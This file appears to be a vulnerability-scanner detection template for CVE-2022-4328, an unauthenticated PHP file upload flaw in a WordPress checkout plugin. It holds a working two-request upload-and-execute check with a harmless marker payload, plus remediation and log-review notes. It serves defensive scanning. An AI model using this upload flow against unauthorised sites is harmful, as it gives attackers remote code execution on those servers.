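# Detection template for CVE-2022-4328: unauthenticated arbitrary file upload
# (CWE-434) in the WooCommerce Checkout Field Manager WordPress plugin
# before 18.0.
#
# Flow: request 1 uploads a marker PHP file through the plugin's AJAX upload
# action; request 2 reads it back from the plugin's upload directory. A match
# means the server stored AND executed the uploaded file.
#
# Operational notes:
#   - Tagged `intrusive`: a match leaves a .php file on the target. No cleanup
#     request is defined here, so remove the marker from
#     wp-content/uploads/cfom_files/ once the finding is confirmed.
#   - Log review: POSTs to /wp-admin/admin-ajax.php with
#     action=cfom_upload_file, and unexpected .php files under
#     wp-content/uploads/cfom_files/, are the traces this check leaves.
#   - Fix: upgrade the plugin to 18.0 or later. Disabling PHP execution in the
#     uploads directory is a general hardening step that also blocks the
#     read-back in request 2.
id: CVE-2022-4328

info:
  name: WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
  remediation: Fixed in version 18.0
  reference:
    - https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
    - https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4328
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4328
    cwe-id: CWE-434
    epss-score: 0.85882
    epss-percentile: 0.98209
    cpe: cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # Two HTTP requests per target: the upload and the read-back.
    max-request: 2
    vendor: najeebmedia
    product: woocommerce_checkout_field_manager
    framework: wordpress
  tags: wp,n-media-woocommerce-checkout-fields,wpscan,cve,cve2022,rce,wordpress,wp-plugin,intrusive

http:
  - raw:
      # Request 1: multipart upload of the marker file. The payload only
      # prints an MD5 of the CVE id string; no session cookie or nonce is
      # sent with it.
      - |
        POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------22728be7b3104597

        --------------------------22728be7b3104597
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("CVE-2022-4328"); ?>

        --------------------------22728be7b3104597--
      # Request 2: fetch the stored file using the lower-cased random name.
      - |
        GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
        Host: {{Hostname}}

    # All three matchers must hold for the same response.
    matchers-condition: and
    matchers:
      # Presumably the MD5 the marker prints (confirm against the payload).
      # The uploaded source does not contain this string, so it appears in
      # the body only when the server ran the PHP instead of serving it as
      # text.
      - type: word
        part: body
        words:
          - fe5df26ce4ca0056ffae8854469c282f

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# NOTE(review): the digest below was issued for the upstream template text.
# Comment or layout edits presumably invalidate it; re-sign before relying on
# template signature verification.
# digest: 4a0a004730450221009c976dda2cb658ebc097e28392ad4e01f7246a9e8d32e938fda7269404310edc0220796432ff4156bc8eb3663646ca08d524198c84d223404f89a4cf4cf08be4611d:922c64590222798bb761d5b6d8e72950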